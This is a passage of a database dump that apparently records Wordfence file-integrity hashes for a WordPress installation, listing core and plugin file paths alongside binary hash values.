57[�','wp-content/plugins/wordfence/lib/email_newIssues.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�q��3岛�u�`�At','m)Th�)�\"=>�#a���Z;V<\0`�h	�5�w','',0,'?'),('����UNEA�g�t','wp-includes/js/customize-selective-refresh.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�uP岉�0x\Z�����','��q�˖jZC~����<sħ+�RI!�H��','',0,'?'),('�A�o�!�V��ų`v','wp-content/wflogs/ips.php',0,'lC�db��.�˴�v','lC�db��.�˴�v','Z][W��P�}�,������7*�q��\n��Ƒ��','',0,'?'),('��v�i� w�Dz�','wp-content/plugins/redirection/locale/redirection-nl_NL.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5$�걆V�ސ�9�A','�\\#0a�\n\0�U�����S4 Q-�ߐM�C|','',0,'?'),('�t�YSQ/[��R�C','wp-includes/blocks/gallery/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�y_<n�dc��F���','�8y�4���>\"�3bem3B٣	�È��L} ','',0,'?'),(' o��ƕ��t_��\0.�','wp-content/plugins/wordfence/views/options/option-switch.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���+��\'|�','�C�Z���hau�ݣ�K�Cif!�����\'~F�p','',0,'?'),('%~WN82��Q�O���','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Domain.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n4�F��0JC� n��k','�Cb,���\"�\">j���Ŋ��AlD�','',0,'?'),(';�\0v�z��Xz<C�AI','wp-content/plugins/redirection/database/schema/231.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J�],N�:��p��3�','���iP�x�]v��Ӱy6����zП3d8n��/','',0,'?'),('\\���\Z�e	�)��Up','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ȑH�\Zb�>V�D��R2','rћJԑI/�\nO�Y}�x��ņ����U ','',0,'?'),('w���+\0���2�R','wp-includes/sodium_compat/src/Core32/SecretStream/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Zjo�\0��y,�*�}c','2p\"Wj����s�lf&S@�[�\\��\"W�','',0,'?'),('�-��B��|tS^�','wp-includes/customize/class-wp-customize-nav-menu-section.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ԡ�P�\n}�$','�vG~?t7\0��h�R,��|�]9��p�.J�w','',0,'?'),('�ECW��`�`��-�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/.php_cs',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_@�e���3�b��B','�L�ؤ@J�9OhG�@@��Z!��\08#l�(','',0,'?'),('�t��d!b΢��ɪ�','wp-content/plugins/wp-cerber/assets/flags/tv.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','JP��ށ��߼J�','۽����ɇR�ZN��P����bX�c9h;��','',0,'?'),('΢�S˪�\n��B�V\"','wp-includes/fonts/dashicons.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��_�3$_�n��5��X',';ʐ\'8�4aOoY8-U�62���K�qq�$B�x','',0,'?'),('��\\��h\Z��)Ġ�','wp-includes/blocks/paragraph/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���{3�&�\n��%t��','�w�Ņ�k]�	�y>���)q�8j�A_Sʌkׂ','',0,'?'),('�*Q.	�-c�%�D','wp-content/plugins/wordfence/lib/flags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i��c�磭��c�-','8�Y��CO���0�j{�\Zx��D�Ė��x�O�','',0,'?'),('\n	M�I�~�YEO��]�','wp-includes/blocks/post-featured-image/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��j鏉��P�)�3K�','����%�,\'\\S�GK,�bCT����S�','',0,'?'),('��ܡ9�u_\\\n�9�\'','wp-admin/css/color-picker.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���x��Ti6���','ۣq��T��zu���Oi�\\�5ЯY�u��~=c','',0,'?'),('Ʀ�+����W�f3','wp-content/plugins/all-in-one-wp-security-and-firewall/languages/all-in-one-wp-security-and-firewall-nl_NL.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���7dž�唝�\0q�2�','#/{�%�O\ZM��*��p9�:�*�_^�\"�:Q�','',0,'?'),('�KU�g0MU�/��ʇ','wp-admin/admin-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Xo��_���Բ)\n��r','�(�Z!.�e��TU92;�����ݏt5o�^','',0,'?'),('\Z[�`��0CI$T��\'�','wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)�H��$I�3��^0','Dsmr?v�jz����Mo�3=b0���K�R#','',0,'?'),('4;V��\'�/����f�','wp-includes/js/jquery/ui/effect-scale.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��KaJ�d���J\'^','_��q�x#�_�\0��<�J�c��~�ұ�ǫ','',0,'?'),('7���OW\n@�a','wp-admin/css/colors/modern/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ф�o���/}��j����','7�(�3�\r�@����H��l͋��%>�M����','',0,'?'),(':�f�?bj���.���','wp-content/plugins/wordfence/views/blocking/block-list.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']#{�1�����&v�','�^P�b.|�=>�S����#\'\r�l�]�^�','',0,'?'),('T�Ę5VH���P{��','wp-includes/Requests/Exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Flkٮ�<v�wSH�\\','-@��g %�����uON\\}@l���f\'���','',0,'?'),('��jo����8D��k','wp-content/plugins/wp-cerber/assets/flags/tz.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j�0���1�_NM','��_i`K�@D4���=�Z�2QcuY!z�=����','',0,'?'),('���C\n���U���','wp-admin/js/custom-header.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ݎ�\Z���\Zڸ���','��v�N����;d�V��5d���t�,�','',0,'?'),('��0l��j�0+%�','wp-includes/SimplePie/Source.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a��A:�$]B-�vw�)','�\"���9M�a���U�_�h�I��>�,]�C�','',0,'?'),('�>�*a�\\A8g��F$','wp-content/plugins/all-in-one-wp-security-and-firewall/languages/all-in-one-wp-security-and-firewall-zh_CN.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&κy�F�w�Ӗ�\0Hv','�A���Dv��.H�%J�Iׁ|�>*e�M','',0,'?'),('���窒�u��\rZJW+','wp-content/plugins/wordfence/images/help.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$N�;\'��M��� Y','���\Z�7\0��r€/i��z;ki,�=L�Z�g���','',0,'?'),('�)����t\r�,�Jڼ','wp-admin/options-permalink.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&v\"W�Y�I��7�','\0����3<�V�)>�^�08��$]�(�4�N','',0,'?'),('�?DŽ����:\n��X','wp-includes/customize/class-wp-customize-theme-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�	�K���WTՂ�c�','�&�^��J�eFX*i-t��;��8��t�\0O��','',0,'?'),('��g�<)��t.F��','wp-content/plugins/wp-cerber/assets/flags/aw.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e�g�qAŎ�RAj�?&v','J	�M��wPs���0)n����F����b��','',0,'?'),('\Z��) �%iy�δ','wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}+#z,��e�rEJ-','sf��q@��8�!yW�&ڔA�+/�uY���44�G','',0,'?'),('\Z�K��a�2Sc��kI','wp-content/plugins/wp-cerber/assets/flags/za.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��	֨���˅hq�d�','s��Δ��֫V��`��`�R	;��cϯ���','',0,'?'),('3�d����yj�����V','wp-content/plugins/wordfence/lib/menu_firewall_blocking.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@O<�.<)�$�ޓ��','\Zޛp���	���>��B*\'��^����T�','',0,'?'),('R�r�r�(�ȟ��P�','wp-includes/blocks/media-text/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���v�T-�M�%g7�','��\",?sM�|5H1���/��&+�;cޢ���F','',0,'?'),('Wl��y:�\0Vn`�d\0�','wp-includes/js/tinymce/plugins/wpview/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&���\rb���!���',',�`i�t���ڎ�Tm��l��k�s�\r=','',0,'?'),('h8�ʯn��-��	*','wp-includes/blocks/buttons/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��9�X@4�=�k�wjW','�ZvrNM)��I6�,�B%{��i���4�','',0,'?'),('�9��>���7','wp-includes/blocks/site-logo/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;&kg��\"���*����','�LuG�`���TYL��흯#Yﰤt�^�J','',0,'?'),('�,�4#��(�#','wp-signup.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ģ�`,��E��@�<','�ܽf��?c�Z��m)|Mtɬt��\0ݏ�','',0,'?'),('�)�Pe��D��� s','wp-includes/blocks/group/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l��օ�5ރ��|�q�','۞\Z���}=eJ]�0]��uCG�.�0NA�\Z','',0,'?'),('ǖ��d�!s<X��Я','wp-content/plugins/wordfence/modules/login-security/classes/model/settings/wpoptions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*�1{,˾�ʂ��','<�G���$�U+�k�L>\0h�ahB��S�-�','',0,'?'),('�*沫�Q�N','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-textarea.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oV�7PR~׬���ai','b�\Z�����s#:�*�\\���\'�i@���qa','',0,'?'),('�Ĉ��ψ�x�>�H','wp-content/plugins/wp-cerber/assets/flags/sd.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1y����s�)�x�','�	�ZL���2���H��j�o�i�����','',0,'?'),('��y7��MA�@���','wp-includes/widgets/class-wp-widget-rss.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ب&cF:�5��i^O','�A�_~�3yo\'iq)��^D�E��4�,	 �s','',0,'?'),('�_)0d|�6_�;n','wp-includes/js/dist/rich-text.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I�9vũ\n��\"t�u�','�G��̚���e1�\0!��y?YDV�Y=�اZ�$','',0,'?'),('=�	��\\vV�����x','wp-includes/blocks/rss/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��u�zwj2���;3� �','�ZE�]!%��AH�XX%{�GT�p��1U','',0,'?'),('��<��i����Q\0','wp-includes/js/dist/reusable-blocks.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�9Ml��)�vI�q��','qhZ������U�T\nr�cn�ݭ����;�','',0,'?'),('�`&%eF�g����d','wp-content/plugins/wordfence/models/block/wfBlock.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=���L@�ʐA��','\n�S�Y>�l�*ϸC@z&+ z�dAW���w�\n\r','',0,'?'),('�\"�sybNl-���','wp-includes/blocks/preformatted/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)1n8.R���*','v�[��7�/N@3)}�o�x���t�7�Nk��','',0,'?'),('�:8�Ia��øl�m','wp-admin/includes/class-ftp-pure.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T&�}�\\3��J�� \0','�\nS�{U��Cdz$����y���a|8�[','',0,'?'),('����KqM���{���','wp-admin/css/dashboard.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�������>�	4��','��kST�_�e�S-~���-�j�W����+�','',0,'?'),('��sݜ�Þ3�����','wp-content/plugins/wordfence/modules/login-security/views/options/option-captcha-threshold.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#��7Ih�!���_�','�y�۹�����������!�H���HGH','',0,'?'),('�{xZ�c�\"�hb�?�','wp-includes/js/dist/dom.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��gF�!Y��(��E�','���G�5a�*�G��S�$!X�O\0ʺ','',0,'?'),('�TB��O>�v2��}Ea','wp-includes/SimplePie/Locator.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g�3�y�%14���','<���ms�4�3p-I�/�8\'J�� }.�','',0,'?'),('Ȓ\"N=�L��.�U','wp-includes/blocks/more/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ύU����wiA���G�','��k/q��֧���]�y��A��ݾ}G���','',0,'?'),('��ϝ��6=��̍�','wp-includes/blocks/post-excerpt/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0��)\0Ь�/o','F�+h���p��a�qÉ�Fb�A�3i�<��','',0,'?'),('��W�MF`3��$��','wp-includes/rest-api/fields/class-wp-rest-term-meta-fields.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2��CECZ6���e�','\\W��.£���;\\	�K��[�zHEI�8��A','',0,'?'),('��*�7\r��?�','wp-includes/class-requests.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=n�L��jdBS;S?','D;U�\\�Q&�G���U��κ�\r����p-','',0,'?'),('L��e`d�˻��W','wp-content/plugins/wp-cerber/assets/flags/je.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L,������Ֆ4�','=D�wN��+UaF�0�^.sG�����?���','',0,'?'),('�l1�r$~�A�)','wp-content/plugins/wp-cerber/assets/flags/as.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��X�/����Z�3�','��UŰ�\r�^�W�}�Ux\"�C�@�Scu�l','',0,'?'),('�s��y��%#�r��=','wp-includes/rest-api/endpoints/class-wp-rest-widget-types-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�g4 V�\'_$�','(���\nN[-��$�,��AUk�q�e�A�38','',0,'?'),('�of?�3�P�1�\"�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/ChaCha20/IetfCtx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g\"̤/O���Y��\'','�8�e�T�et\r j�P�/��J���<^�rӥz','',0,'?'),('F��e���}�(��','wp-includes/js/jquery/ui/dialog.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']2�z�L!E��,�C\Z','���|\r�Ce>�/k˪�\"E�0�݀V�L�','',0,'?'),('N�\0f��~;I���','wp-content/plugins/wp-cerber/assets/flags/bm.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��y��g��¶Mn�z�','��<������@ H�*��eթ�G�)�-CIԲ^','',0,'?'),('i1��E~N�I�A͔��','wp-includes/Requests/Cookie/Jar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y6��������5�D�','��5�t���i�kt�j3�\r��h�v�acJ\r��','',0,'?'),('s♼{DR�[�k�1�I','wp-content/plugins/wordfence/images/logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�zF��ހW�\rl�~6','V�{��Q9�V	����J	X�q���ڀc�','',0,'?'),('����X/��\0��	','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/sqli.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����iJ�B�!<\0','V��4�^�C�D�\Z��������;��U�z','',0,'?'),('���}/�pS���','wp-includes/blocks/page-list/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\Jn[\'Zp!�Y�$�S','��p�-CF�M�b�b�-H�������l�','',0,'?'),('�N3M�\n��S��0j','wp-includes/js/dist/block-library.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']���ϸ��k*\n�','���\Z�P9Q\\\0;lb��UE �}��4����v�','',0,'?'),('�x(�ťܺ�.���Շ','wp-includes/class-wp-session-tokens.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9]�K�UJW�*��h�=','���4�\ZQuA^ء��j򬪎$M��0�\0','',0,'?'),('Ԓ��A����r��^','wp-includes/js/wp-custom-header.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�C@$ҷ�SE��#�','��\"�y�䓧��}��^H�z�%��Z��у���','',0,'?'),('�8r���~x�T�F�','wp-content/plugins/all-in-one-wp-security-and-firewall/languages/all-in-one-wp-security-and-firewall-ru_RU.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G�\'�:��\Z��9I','�*�H�[8�em�\Zx�\Zc�=x�E����m','',0,'?'),('�z��a>`<��!�C�t','wp-includes/css/dist/block-library/reset.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3�U_`�#��RC���','�~o\n�婠ibЗӪ��ȳS����;�Ү�Y','',0,'?'),('�^0p����k����M','wp-includes/css/dist/nux/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',�Ҩ r�c�V�','mt���� ҡ;��E�K�U�8D��8�-�B','',0,'?'),('�S	����g	N�d','wp-content/plugins/wordfence/modules/login-security/classes/controller/wordfencels.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Vg@�ݕX43�Ё',',D�U�}�>���q��!�5r�)0G����','',0,'?'),('���h]��C���A*','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Ed25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'I�˞aFtz\\�Ǯ','���Ҭ�\ZADs���5����?���D�A/<�:','',0,'?'),('�0ܚ�Z�I�丱N','wp-includes/sodium_compat/src/Core/ChaCha20/Ctx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'�U巃�� qD�F��H','���Ԧ�!���ӢtL�k.�\"1��Cm�Kg�','',0,'?'),('�3ƹܕj�bi�Υ�','wp-includes/customize/class-wp-customize-nav-menu-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@V{R#8�7n�n\n�','��a�H����Muyw?�h:�B��<=��,##�','',0,'?'),('�	wE��r��} �','wp-content/plugins/wp-cerber/assets/flags/gq.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','׾�\r�>.ⶱ���G','�d����^f�r��=�mM���Y��,���','',0,'?'),('\Z6B8��c����eg','wp-includes/blocks/shortcode/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����X�cy	F�JGs','� �L���(��5g\0��[[{d��Nm�j���','',0,'?'),('b���E�����4t=','wp-content/plugins/wordfence/views/dashboard/options-group-alert.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�̻o��wG>p','�I�`I^{�Pנh�Q��e:sG^��8�sĚ','',0,'?'),('��,‚=9���h�6K�','wp-includes/js/jquery/ui/draggable.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��:2��g9�tL�D�','��Cu�o.t�?�xd�x�CK�6�Ηp_�','',0,'?'),('��un�Rـ���:9��','wp-content/plugins/all-in-one-wp-security-and-firewall/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\\\"*��!83�+','��Ӻ:�B��ֶV�Ɍ)�Nɳ��p�','',0,'?'),('�#O�������X^�v','wp-content/plugins/redirection/models/request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Ӹx�v)�W�o�',':H,�}��\"V%5`<�Z`��u�T5\\}j���u�S','',0,'?'),('�0���զ����','wp-content/plugins/wp-cerber/assets/flags/gw.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*qWM����f2�c','d�n�;L�m%��\"NA�oZE!���J�_͆�','',0,'?'),('��>�/ᡇ_����','wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�l([qא��D#��','\\sٶ�hb�2.;�m`F��r^&�H-w	�yV�~','',0,'?'),('�&UX\r�L4{����','wp-includes/js/utils.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t��0�`ߣ���MVi`','�js�@Vna�v�t\'ȀD��,݆���T;','',0,'?'),('\Z֧��\\\Z�h�i','wp-includes/js/dist/blocks.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7�;Z\"�y��u�uH�','��VqE\"	d0;�ܬ�1��D�s���(��','',0,'?'),('\ZO�3F5K�;�@ �','wp-content/plugins/wordfence/modules/login-security/classes/controller/cron.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@�q\\�}����[�','�[�T�n�Ejd�(�$�:!�h�Ν\0�s�><','',0,'?'),('\Z&�cR�< FiC�','wp-content/plugins/wordfence/modules/login-security/views/options/option-text.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ƥܐ�W^�[�g�','�dL�����cK~=0jE�]�����~\"�','',0,'?'),('\ZN\Z�`i̳%�ج0','wp-content/plugins/wp-cerber/assets/flags/cn.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�A���-V�|֬S���','j�_�\r49�>�x+E�X��H��dF���K�`','',0,'?'),('\Z�����L6N�1�;8�','wp-content/plugins/wordfence/modules/login-security/views/page/section-title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"���w^\n���k�6','�!�5�@�a�6t�o�5(D�s���\n��K�f','',0,'?'),('\Z�;5�(��O�O�R�','wp-content/plugins/wordfence/lib/dashboard/widget_content_countries.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ǜ����lm�D!','�\'�9�\r9�\0o|��\Z������|����0K','',0,'?'),('\ZŴԭ�xvw�E\nv','wp-content/plugins/wp-cerber/assets/flags/mk.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��x���Zx��e��','Ŷv�ew��s��֝�wx�YԌ[@eQ�C�j','',0,'?'),('\Z����)qtsCI9','wp-includes/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ota���S�˳w�','q���b���i{ڇ��q��\n1:�ŘL�1�q\"','',0,'?'),('\Z�y��8R#O�y��','wp-admin/css/nav-menus-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s���U�v3չ��','U�F�?�Y��dH8ra�%����4���w�','',0,'?'),('\Z��\Z:\\��Rf�P�~3','wp-includes/class-wp-metadata-lazyloader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I^�P���;$�+\"�','^2��)E>X���4�:��U&�߳;���!e','',0,'?'),('\Z�UE�s(��#E�p','wp-includes/images/smilies/icon_mrgreen.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$_��u�X|I%~$','!B���I1�mV�-���|ј�X5D�8���h�','',0,'?'),('\Z���/�̓��T%�g4','wp-includes/js/jquery/ui/effect-drop.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���閴�u)�B���1�','��v��h��d���L�V�y􅊖�^n\"�ّ\0]p�','',0,'?'),('$�P�`��\0g�X�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/Cached.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yF“\\����2���','2k�s��\\>��RI:nH�ȿDm�!zz���','',0,'?'),('\'^	�} -R�Ȗ4�','wp-content/plugins/wp-cerber/languages/wp-cerber-de_CH.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q�kmf--�=��?	ox','���v�Ĭ�ኾ+]^�CR.ؠ�$b�Cf�','',0,'?'),('-��c�<���@�VsZ�','wp-includes/js/api-request.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9����߿G7p6{�g','�d�6Q\\����f�:�����G`��j1V�','',0,'?'),('_��z���9�݀D:��','wp-includes/blocks/media-text/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/��~��b�7��','�m��9�\Z�KF��r�R��\r�O�,yE�','',0,'?'),('�y���!�\0pZ�[A','wp-includes/js/mediaelement/mediaelement-and-player.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m�iz+*;)��E�','�-5(��:�oQ[̪���\\�\nm~�CP','',0,'?'),('��E�ȖqȊ?2�H�','wp-includes/js/dist/api-fetch.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����n�m�h��{�P�','�(�Ԅ\"�@>ajw@w�74U�C0�D�6/��|�','',0,'?'),('�5pު�m�\Z��','wp-includes/blocks/separator/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��|�D��JoA���','\"w�	��u���{[�H�6W�ο��','',0,'?'),('��<b���!ž�','wp-content/plugins/wp-cerber/assets/flags/ge.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Aw�J#ܿ�d��F','��6��o�M�X��ݕ�D���֖M�+','',0,'?'),('ֻE\n�<�B�[�,','wp-includes/class-wp-ajax-response.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o6�)�Q�\"Sσt�.H�','��[��$���g�nM!^\\���9t�t��>Z�','',0,'?'),('N	L�6�����','wp-content/plugins/wordfence/modules/login-security/js/jquery.tmpl.min.1629122067.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\}�\"���7ڷ��DZ','�.I�H\Z�g\0�H!7`��gޠZ�zȄ�ž6|','',0,'?'),('�m��n9�F�6�','wp-admin/css/admin-menu-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��8d(O��VYE�Ä','G��՜�.��t���zYg�^��q����,��','',0,'?'),(')�M��^�ûoz�','wp-admin/images/loading.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@�ל�x>c������¢','�<\0Ѕҩ��هqU%��G��7r�\\�*��2J','',0,'?'),('4%�IH�O��ʰ�L','wp-includes/css/media-views.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6�Y�)���#ݖ��q','7��4Üe���;�s�@�,4�D��y�d','',0,'?'),('C�/�;)��ّ�o','wp-admin/js/comment.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��	�\'v�\\�t\'�ӵ�','ku0��\\�V�{0�wZN%Y-�)������^`','',0,'?'),('H-�F!|�J�+)u','wp-includes/blocks/post-content/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+c;N��/�ݠv�.','��\Z�$��#�k\\=�����Z��G�v��܌o','',0,'?'),('H��~�\n��x����|','wp-includes/js/dist/token-list.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��-�\\�^�kL','�ZZcа��9)Ej&;|����&�[I����','',0,'?'),('T�gslF��ʞ�Ly','wp-admin/js/set-post-thumbnail.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1�P�N�H�9e�@I','e}#����n�q�J�rJ��Q<d��Z�K�4','',0,'?'),('Y ����S��z�X^','wp-content/plugins/wp-cerber/assets/flags/bj.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z��̂(,�ߨP}r��','�`	�U�Y�ģ���Ç�/�5��T��\"5','',0,'?'),('a�@�WrQw��Z\n.�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Poly1305.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ܑz�g<N��\n?o6f','���R����Eg�X3��JAc��!a�_��S{','',0,'?'),('z�|*6�S\\5��3','wp-content/plugins/wordfence/lib/wordfenceScanner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I��J &�����','�9ʲt�������m�����?z5\\�0nl','',0,'?'),('�\n$z�X�`�1Bw','wp-includes/js/tinymce/plugins/charmap/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\\��5^����','[�B�\Z,;��j�fe�MU�j|)�rv��>U�F','',0,'?'),('��=b�6��hs���t','wp-admin/ms-themes.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��:1R]	l�I��!#_J','7�E��H��